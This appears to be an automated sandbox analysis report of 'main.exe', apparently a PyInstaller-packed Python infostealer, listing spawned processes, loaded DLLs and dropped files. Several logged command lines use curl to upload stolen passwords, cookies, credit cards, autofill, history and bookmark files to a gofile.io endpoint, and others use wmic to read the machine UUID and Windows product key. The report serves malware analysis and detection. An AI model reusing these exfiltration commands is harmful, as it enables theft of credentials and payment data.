Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKeyJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: sqlite3.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: main.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: main.exeStatic file information: File size 27577634 > 1048576
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: main.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.1952863479.000001ED8BCB0000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
Source: libcrypto-3-x64.dll.0.drStatic PE information: section name: .00cfg
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
Source: legacy.dll.0.drStatic PE information: section name: .00cfg
Source: mfc140u.dll.0.drStatic PE information: section name: .didat
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: python311.dll.0.drStatic PE information: section name: PyRuntim

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\main.exeProcess created: "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pywintypes311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_webp.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules\legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pythoncom311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Math\_modexp.pydJump to dropped file
